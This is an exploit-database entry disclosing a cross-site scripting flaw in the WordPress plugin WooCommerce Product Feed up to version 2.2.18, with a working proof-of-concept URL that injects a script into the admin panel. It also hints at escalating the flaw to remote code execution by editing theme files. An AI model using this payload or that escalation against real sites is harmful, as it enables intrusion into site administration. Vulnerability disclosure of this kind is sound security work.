Wordpress plugin woocommerce product feed 2.2.18 crosssite scripting Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-08-30 |
Type : webapps |
Platform : php
[+] Code ...
# Exploit Title: WordPress Plugin WooCommerce Product Feed <= 2.2.18 - Cross-Site Scripting
# Date: 30 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/
# Version: <= 2.2.18
# Tested on: Ubuntu 18.04.1
# CVE: CVE-2019-1010124
The WordPress plugin 'WooCommerce Product Feed' does not correctly sanitize user-input,
which leads to Cross-Site Scripting in the Admin Panel.
Since it is WordPress, it's fairly easy to get RCE with this XSS, by editing the theme
files via (for example) XHR requests with included Javascript.
Proof-of-Concept:
https://domain.tld/wp-admin/admin.php?page=woo_feed_manage_feed&link=%3E%3Cscript%3Ealert`zerodays.lol`;%3C/script%3E